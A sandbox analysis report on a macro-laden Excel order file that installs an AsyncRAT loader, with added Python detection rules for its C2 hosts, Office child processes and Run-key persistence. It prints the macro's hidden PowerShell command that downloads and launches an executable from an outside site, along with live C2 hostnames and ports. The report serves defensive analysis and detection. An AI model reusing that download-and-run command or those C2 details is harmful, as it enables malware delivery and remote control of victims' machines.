Analysis
- max time kernel: 144s
- max time network: 147s
- platform: windows10-2004_x64
- resource: win10v2004-20230220-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 16-03-2023 02:55
Behavioral tasks
- behavioral1: sample ORDER-230316.xlsm, resource win7-20230220-en
- behavioral2: sample ORDER-230316.xlsm, resource win10v2004-20230220-en

The signatures, process tree and dumps below belong to behavioral2 (Windows 10 2004 x64); the YARA memory hit is tagged behavioral2.
General
- Target: ORDER-230316.xlsm
- Size: 41KB
- MD5: 91b915d7c1079e51e241748a006da03c
- SHA1: 846a9d44011340ebc31439f316efc2d1e5b279a6
- SHA256: 7508dd55323850161d037626592fc56eb6be4cc917c68ba90f3c5866f5c2b59d
- SHA512: e40c725e1ca805ea9613e6f8f77f1119337e5bda49b6f5cd1f3cd7aa9f4f4da2aa744ec86cc6c5d7f264173390148ba07cc7968c22d340aceea31df5d3bf54c2
- SSDEEP: 768:iATtXvQ04qta8v+nWE8hMBIJYfTH+niSplFFiKk/fsgvRag+neWM:VxvSqJv+xG1BjFFi3/Egvg/e9
Malware Config
Extracted: asyncrat
- Version: 0.5.7B
- Botnet (group) ID: LATEST
- C2 (host:port):
  - chongmei33.publicvm.com:2703
  - chongmei33.publicvm.com:49746
  - chongmei33.publicvm.com:6974
  - chonglee575.duckdns.org:2703
  - chonglee575.duckdns.org:49746
  - chonglee575.duckdns.org:6974
- Mutex: AsyncMutex_6SI8OkPnk
- delay: 3
- install: false
- install_file: update.exe
- install_folder: %AppData%

Both C2 names are under free dynamic-DNS zones (publicvm.com, duckdns.org), so the resolved addresses are not stable indicators; the names, the three ports and the mutex are. Note also that the config says install=false with update.exe as the install file, yet the Run key recorded further down points at C:\Users\Admin\AppData\Roaming\svchost.exe and was written by the loader (tmp9CE1.exe, pid 4400), not by the injected RAT. Treat the config fields as the payload's own settings and the Run key as the loader's persistence, and hunt for both.
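Matching telemetry against this configuration, added here as an example and not part of the sandbox report: the C2 names, ports and mutex are taken from the config above; the DNS, connection and mutex records and their key=value format are constructed for illustration.

```python
"""Match host and network telemetry against the extracted AsyncRAT config.

Added example; not part of the sandbox report. Only the C2 entries, ports
and mutex below come from the report. The event records and their
key=value format are constructed for illustration.
"""
from __future__ import annotations

import re
from typing import Optional

# C2 list exactly as extracted from the sample's configuration.
C2_RAW = [
    "chongmei33.publicvm.com:2703",
    "chongmei33.publicvm.com:49746",
    "chongmei33.publicvm.com:6974",
    "chonglee575.duckdns.org:2703",
    "chonglee575.duckdns.org:49746",
    "chonglee575.duckdns.org:6974",
]
MUTEX = "AsyncMutex_6SI8OkPnk"

# Both C2 names sit under free dynamic-DNS zones, so the resolved address
# can change between runs. Matching therefore keys on the name and on the
# port set rather than on any IP address.
DDNS_ZONES = ("publicvm.com", "duckdns.org")


def parse_endpoint(entry: str) -> tuple[str, int]:
    """Split 'host:port' into (host, port); rpartition keeps IPv6 literals intact."""
    host, sep, port = entry.rpartition(":")
    if not sep or not port.isdigit():
        raise ValueError(f"malformed C2 entry: {entry!r}")
    return host.lower(), int(port)


C2_ENDPOINTS = {parse_endpoint(e) for e in C2_RAW}
C2_HOSTS = {host for host, _ in C2_ENDPOINTS}
C2_PORTS = {port for _, port in C2_ENDPOINTS}


def is_ddns(host: str) -> bool:
    """True when the name is in (or under) one of the dynamic-DNS zones."""
    host = host.lower().rstrip(".")
    return any(host == z or host.endswith("." + z) for z in DDNS_ZONES)


# Constructed telemetry (not from the report): one line per event.
SAMPLE_EVENTS = [
    "type=dns pid=2140 image=tmp9CE1.exe query=chongmei33.publicvm.com",
    "type=dns pid=2140 image=tmp9CE1.exe query=chonglee575.duckdns.org",
    "type=dns pid=1336 image=EXCEL.EXE query=officeclient.microsoft.com",
    "type=dns pid=5000 image=chrome.exe query=myhome.duckdns.org",
    "type=conn pid=2140 image=tmp9CE1.exe dst=203.0.113.7 dport=2703",
    "type=conn pid=2140 image=tmp9CE1.exe dst=198.51.100.4 dport=443",
    "type=mutex pid=2140 image=tmp9CE1.exe name=AsyncMutex_6SI8OkPnk",
]

_KV = re.compile(r"(\w+)=(\S+)")


def parse_event(line: str) -> dict[str, str]:
    return dict(_KV.findall(line))


def classify(event: dict[str, str]) -> Optional[str]:
    """Return a verdict for one event, or None when nothing in the config matches."""
    kind = event.get("type")
    if kind == "dns":
        query = event["query"].lower()
        if query in C2_HOSTS:
            return "C2: known AsyncRAT hostname"
        if is_ddns(query):
            return "suspicious: dynamic-DNS lookup"
    elif kind == "conn":
        # A port match alone is a hunting lead, not proof: the address is
        # whatever the DDNS name pointed at when the sample ran.
        if int(event["dport"]) in C2_PORTS:
            return "review: AsyncRAT C2 port"
    elif kind == "mutex" and event.get("name") == MUTEX:
        return "C2: AsyncRAT mutex"
    return None


def scan(lines: list[str]) -> list[tuple[int, str, str]]:
    """Return (line number, image, verdict) for every event that matched."""
    hits = []
    for number, line in enumerate(lines, 1):
        event = parse_event(line)
        verdict = classify(event)
        if verdict:
            hits.append((number, event.get("image", "?"), verdict))
    return hits


if __name__ == "__main__":
    for number, image, verdict in scan(SAMPLE_EVENTS):
        print(f"event {number}: {image}: {verdict}")
```

The dynamic-DNS check is deliberately broader than the two names in the config: any lookup under those zones from a process chain that started in Office is worth a look, because the operator can register a new name under the same provider without touching the binary.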
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
  description: Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process
  pid 948 powershell.exe, spawned by pid 1336 EXCEL.EXE
  The sample is a macro-enabled workbook (.xlsm); the PowerShell command line the macro launched is recorded in the process tree below.
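Detection logic for this signature, added here as an example and not part of the sandbox report: it flags any Office parent that spawns a script host and scores the child's command line for the traits of the dropper. The records are constructed in Sysmon Event ID 1 style; the first carries the PowerShell command line recorded in the process tree below, the others are made up for contrast. The parent and child name sets and the trait weights are assumptions.

```python
"""Flag Office applications spawning script hosts and score the child's
command line. Added example; not part of the sandbox report. Records are
in Sysmon Event ID 1 style: the first carries the PowerShell command line
from the process tree, the rest are constructed for contrast. The name
sets and weights below are assumptions, not taken from the report.
"""
from __future__ import annotations

import ntpath
import re

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe",
                  "msaccess.exe", "mspub.exe", "visio.exe", "onenote.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
                "certutil.exe", "bitsadmin.exe", "msiexec.exe"}

# Traits of the dropper command line seen in this run: (regex, weight, label).
CMDLINE_TRAITS = [
    (r"-w(?:indowstyle)?\s+hidden", 2, "hidden window"),
    (r"-e(?:p|xecutionpolicy)?\s+bypass", 2, "execution policy bypass"),
    (r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer",
     3, "web download"),
    (r"gettempfilename", 2, "temp-file staging"),
    (r"rename-item.*exe", 2, "rename to .exe"),
    (r"start-process|invoke-item|\biex\b|invoke-expression", 2, "launch of fetched content"),
]


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def score_cmdline(cmdline: str) -> tuple[int, list[str]]:
    """Sum the weights of every trait present; returns (score, matched labels)."""
    # PowerShell accepts en and em dashes as parameter prefixes (the sample
    # uses one before PassThru), so normalise them before matching.
    text = cmdline.replace("\u2013", "-").replace("\u2014", "-")
    score, reasons = 0, []
    for pattern, weight, label in CMDLINE_TRAITS:
        if re.search(pattern, text, re.IGNORECASE):
            score += weight
            reasons.append(label)
    return score, reasons


def evaluate(event: dict[str, str]) -> dict | None:
    """Return an alert dict for an Office -> script-host spawn, else None."""
    parent, child = basename(event["ParentImage"]), basename(event["Image"])
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    score, reasons = score_cmdline(event.get("CommandLine", ""))
    return {
        "rule": "office-spawns-script-host",
        "parent": parent, "child": child, "pid": event["ProcessId"],
        "severity": "high" if score >= 5 else "medium",
        "score": score, "reasons": reasons,
    }


# Constructed events. The first CommandLine is verbatim from the process tree.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ProcessId": "948", "ParentProcessId": "1336",
     "CommandLine": r'''powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } –PassThru; Invoke-WebRequest -Uri "https://2m-store.com/megaa-store.com/public/wp.exe" -OutFile $TempFile; Start-Process $TempFile;'''},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe", "ProcessId": "2001", "ParentProcessId": "2000",
     "CommandLine": "cmd.exe /c whoami"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\splwow64.exe", "ProcessId": "3001", "ParentProcessId": "1336",
     "CommandLine": "C:\\Windows\\splwow64.exe 12288"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ProcessId": "4001", "ParentProcessId": "4000",
     "CommandLine": "powershell -WindowStyle hidden -File C:\\Scripts\\backup.ps1"},
]


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        alert = evaluate(event)
        if alert:
            print(alert)
```

The parent/child pair alone is the alert; the command-line score only sets severity, so an Office application running cmd.exe /c whoami still surfaces as medium rather than being dropped. The dash normalisation matters because the recorded command line really does use an en dash before PassThru and PowerShell runs it anyway.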
Async RAT payload (1 IoC)
  resource: behavioral2/memory/2140-176-0x0000000000400000-0x0000000000412000-memory.dmp, YARA rule: asyncrat
  The hit is a 72KB image mapped at 0x400000 in pid 2140, the second same-name child of tmp9CE1.exe. The 2.8MB tmp9CE1.exe on disk is the loader; the AsyncRAT payload exists only in that child's memory.

Blocklisted process makes network request (1 IoC)
  flow 43, pid 948 powershell.exe (the Invoke-WebRequest in the process tree below)

Downloads MZ/PE file
  (no IoC detail listed)
Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation (tmp9CE1.exe)
Executes dropped EXE (3 IoCs)
  pid 4400 tmp9CE1.exe, pid 4664 tmp9CE1.exe, pid 2140 tmp9CE1.exe
Adds Run key to start application (2 TTPs, 1 IoC)
  Set value (str): \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\Users\Admin\AppData\Roaming\svchost.exe" (written by tmp9CE1.exe)
  The value name and file name mimic the Windows service host, but the path is in the user's roaming profile rather than System32. The Downloads list below contains no file at that path, so this report does not show the copy being written; check the path on any affected host regardless.
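An added check for this persistence mechanism (example code, not from the report): it inspects registry-set events in Sysmon Event ID 13 style and flags Run-key values that point into user-writable directories or reuse a Windows system binary name outside System32. The first record reproduces the value observed above; the other three are constructed, including a legitimate OneDrive autorun that the same rule flags, to show why an allowlist for known updaters is still needed. The path fragments and name lists are assumptions.

```python
"""Flag Run-key autoruns that point into user-writable paths or borrow a
system binary's name. Added example; not part of the sandbox report.
Records are in Sysmon Event ID 13 style: the first reproduces the value
observed above, the others are constructed. The path fragments and name
lists are assumptions.
"""
from __future__ import annotations

import ntpath
import re

_RUN_KEY = re.compile(
    r"\\software\\microsoft\\windows\\currentversion\\(run|runonce|runservices|runservicesonce)\\",
    re.IGNORECASE,
)
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\", "\\downloads\\")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SYSTEM_NAMES = {"svchost.exe", "csrss.exe", "lsass.exe", "explorer.exe", "winlogon.exe",
                "services.exe", "smss.exe", "conhost.exe", "dllhost.exe", "rundll32.exe"}


def extract_path(details: str) -> str:
    """Pull the executable path out of a Run value: quoted path, else first token."""
    details = details.strip()
    quoted = re.match(r'"([^"]+)"', details)
    return quoted.group(1) if quoted else details.split(" ", 1)[0]


def assess(event: dict[str, str]) -> dict | None:
    """Return findings for a Run-key write, or None when it looks ordinary."""
    target = event.get("TargetObject", "")
    if not _RUN_KEY.search(target):
        return None
    path = extract_path(event.get("Details", ""))
    low = path.lower()
    writer = event.get("Image", "").lower()
    reasons = []
    if any(fragment in low for fragment in USER_WRITABLE):
        reasons.append("autorun target in user-writable directory")
    name = ntpath.basename(low)
    if name in SYSTEM_NAMES and not low.startswith(SYSTEM_DIRS):
        reasons.append(f"system binary name {name} outside System32")
    if any(fragment in writer for fragment in USER_WRITABLE):
        reasons.append("written by a process running from a user-writable directory")
    if not reasons:
        return None
    return {"value": target.rsplit("\\", 1)[-1], "path": path,
            "writer": ntpath.basename(writer), "reasons": reasons}


SID = "S-1-5-21-1529757233-3489015626-3409890339-1000"  # from the report
# Constructed events; the first reproduces the Run value observed in this run.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\Admin\AppData\Local\Temp\tmp9CE1.exe",
     "TargetObject": f"\\REGISTRY\\USER\\{SID}\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\svchost",
     "Details": r'"C:\Users\Admin\AppData\Roaming\svchost.exe"'},
    # Legitimate updater that the same rule flags: allowlist signed vendors.
    {"Image": r"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "TargetObject": f"\\REGISTRY\\USER\\{SID}\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive",
     "Details": r'"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"Image": r"C:\Windows\explorer.exe",
     "TargetObject": f"\\REGISTRY\\USER\\{SID}\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden",
     "Details": "DWORD (0x00000001)"},
    {"Image": r"C:\Windows\System32\SecurityHealthSystray.exe",
     "TargetObject": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "Details": r"C:\Windows\system32\SecurityHealthSystray.exe"},
]


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        finding = assess(event)
        if finding:
            print(finding)
```

The observed write trips all three reasons at once (AppData target, svchost.exe name outside System32, writer running from Temp); the OneDrive record trips two, which is the usual shape of a false positive for this rule and the reason a signer or hash allowlist belongs in front of it.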
Suspicious use of SetThreadContext (1 IoC)
  PID 4400 (tmp9CE1.exe) set the thread context of PID 2140 (tmp9CE1.exe)
  The loader started a second copy of its own image and redirected that child's thread. Together with the eight WriteProcessMemory calls into 2140 and the AsyncRAT YARA hit at 0x400000 in that process, this is the loader hollowing its own child with the RAT payload. The earlier child, pid 4664, shows only the writes common to every process start in this report and no payload hit.
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The sandbox's generic description calls this likely ransomware behaviour; no IoC is listed for it here, and nothing else in the report (an AsyncRAT loader) supports that reading.
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (EXCEL.EXE)
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (EXCEL.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (EXCEL.EXE)

Enumerates system info in registry (2 TTPs, 3 IoCs)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (EXCEL.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (EXCEL.EXE)
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (EXCEL.EXE)
  All six reads in these two signatures are attributed to EXCEL.EXE itself, not to the macro's child processes or the dropped binary, so they carry little weight as evasion evidence in this run.
Gathers network information (2 TTPs, 2 IoCs)
Uses a command-line utility to view network configuration.
  pid 4784 ipconfig.exe, pid 620 ipconfig.exe (ipconfig /release and ipconfig /renew, launched through cmd.exe by tmp9CE1.exe; see the process tree)
Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid 1336 EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (5 IoCs)
  pid 948 powershell.exe (x2), pid 4400 tmp9CE1.exe (x3)

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Token: SeDebugPrivilege enabled by pid 948 powershell.exe, pid 4400 tmp9CE1.exe and pid 2140 tmp9CE1.exe

Suspicious use of FindShellTrayWindow (2 IoCs)
  pid 1336 EXCEL.EXE (x2)

Suspicious use of SetWindowsHookEx (12 IoCs)
  pid 1336 EXCEL.EXE (x12)
  Both FindShellTrayWindow and SetWindowsHookEx are attributed to EXCEL.EXE itself rather than to the dropped binary.
Suspicious use of WriteProcessMemory (28 IoCs)
  Writes grouped by parent -> target (count):
  1336 EXCEL.EXE -> 948 powershell.exe (2)
  948 powershell.exe -> 4400 tmp9CE1.exe (3)
  4400 tmp9CE1.exe -> 2420 cmd.exe (3)
  2420 cmd.exe -> 4784 ipconfig.exe (3)
  4400 tmp9CE1.exe -> 448 cmd.exe (3)
  448 cmd.exe -> 620 ipconfig.exe (3)
  4400 tmp9CE1.exe -> 4664 tmp9CE1.exe (3)
  4400 tmp9CE1.exe -> 2140 tmp9CE1.exe (8)
  Every ordinary parent/child pair in this run shows two or three writes at process creation; the eight writes into pid 2140 are the payload being placed into the hollowed child.
Processes
(Process IDs are taken from the signature tables above; indentation shows the parent/child relationship.)

EXCEL.EXE (pid 1336), image C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ORDER-230316.xlsm"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  powershell.exe (pid 948), image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } –PassThru; Invoke-WebRequest -Uri "https://2m-store.com/megaa-store.com/public/wp.exe" -OutFile $TempFile; Start-Process $TempFile;
    GetTempFileName() creates %TEMP%\tmpXXXX.tmp and the Rename-Item swaps the extension to .exe, which is why the downloaded wp.exe runs as tmp9CE1.exe. The dash before PassThru is an en dash; PowerShell's parser accepts it as a parameter dash, so the line runs as written.
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    tmp9CE1.exe (pid 4400), image C:\Users\Admin\AppData\Local\Temp\tmp9CE1.exe
      "C:\Users\Admin\AppData\Local\Temp\tmp9CE1.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      cmd.exe (pid 2420), image C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c ipconfig /release
        - Suspicious use of WriteProcessMemory

        ipconfig.exe (pid 4784), image C:\Windows\SysWOW64\ipconfig.exe
          ipconfig /release
          - Gathers network information

      cmd.exe (pid 448), image C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c ipconfig /renew
        - Suspicious use of WriteProcessMemory

        ipconfig.exe (pid 620), image C:\Windows\SysWOW64\ipconfig.exe
          ipconfig /renew
          - Gathers network information

      tmp9CE1.exe (pid 4664), image C:\Users\Admin\AppData\Local\Temp\tmp9CE1.exe
        C:\Users\Admin\AppData\Local\Temp\tmp9CE1.exe
        - Executes dropped EXE

      tmp9CE1.exe (pid 2140), image C:\Users\Admin\AppData\Local\Temp\tmp9CE1.exe
        C:\Users\Admin\AppData\Local\Temp\tmp9CE1.exe
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken

cmd.exe and ipconfig.exe were requested by their System32 paths but ran from SysWOW64: the loader is a 32-bit process (its CLR usage log lands under CLR_v4.0_32, see Downloads), so file-system redirection applies to everything it launches. The release/renew pair drops and re-acquires the DHCP lease before the RAT payload is injected into pid 2140.
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tmp9CE1.exe.log (1KB)
  MD5 7e88081fcf716d85992bb3af3d9b6454
  SHA1 2153780fbc71061b0102a7a7b665349e1013e250
  SHA256 5ffb4a3ea94a6a53c4f88e2191c6fec5fd8a7336e367aa113fe8c12631e0c4d2
  SHA512 ec606e14367ae221c04f213a61a6f797034495121198e4788e3afa4aa8db67bf59c5c5210a56afae5557158e8923b013b371b84c7d64303618c5b4c57a2224f7
  This usage log is written by the .NET runtime, which identifies tmp9CE1.exe as a 32-bit CLR v4 (.NET Framework) executable.
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m4yzm4mo.11b.ps1 (60B)
  MD5 d17fe0a3f47be24a6453e9ef58c94641
  SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  PowerShell writes this file at start-up to test whether an application-control policy (AppLocker/WDAC) is enforced; it is a side effect of powershell.exe running, not attacker content.
- C:\Users\Admin\AppData\Local\Temp\tmp9CE1.exe (2.8MB; the report lists this entry five times with identical hashes, collapsed here)
  MD5 604352a51c64f59c25a04991f42a4418
  SHA1 29d4fafa442693ae60f92816aa7f55e3a215fd3c
  SHA256 43639284cc83ca4b36e9996c616e4dae98fe4e49b2878bb0d4fc07d3fd8ed0ff
  SHA512 e51cf68cdee9242996f0b7d7d11d812e27b30fc8f7628aff4c066251c41d18144692be2bfd6a45cfb50ef4d70f3e6e1e2e5a53dc5af0af6f5065d9bf14d7a96c
  This is the loader downloaded as wp.exe; the AsyncRAT payload itself was only observed in memory (pid 2140, below).
Memory dumps (pid-index: range, size)
- 948 powershell.exe
  154: 0x0000019977FC0000-0x0000019977FE2000, 136KB
  155, 156, 157: 0x0000019977CE0000-0x0000019977CF0000, 64KB each
- 1336 EXCEL.EXE
  133, 134, 135, 136, 137, 210, 211, 212, 213: 0x00007FFD8AB30000-0x00007FFD8AB40000, 64KB each
  138, 139: 0x00007FFD886C0000-0x00007FFD886D0000, 64KB each
- 2140 tmp9CE1.exe (hollowed child)
  176: 0x0000000000400000-0x0000000000412000, 72KB (AsyncRAT YARA hit)
  180, 191: 0x0000000003480000-0x0000000003490000, 64KB each
  195: 0x0000000006050000-0x00000000060EC000, 624KB
  196: 0x00000000066A0000-0x0000000006C44000, 5.6MB
  197: 0x0000000006160000-0x00000000061C6000, 408KB
- 4400 tmp9CE1.exe (loader)
  171: 0x00000000000C0000-0x0000000000392000, 2.8MB (matches the on-disk size of tmp9CE1.exe)
  172: 0x0000000004E80000-0x0000000004E90000, 64KB
  173: 0x00000000050A0000-0x00000000050C2000, 136KB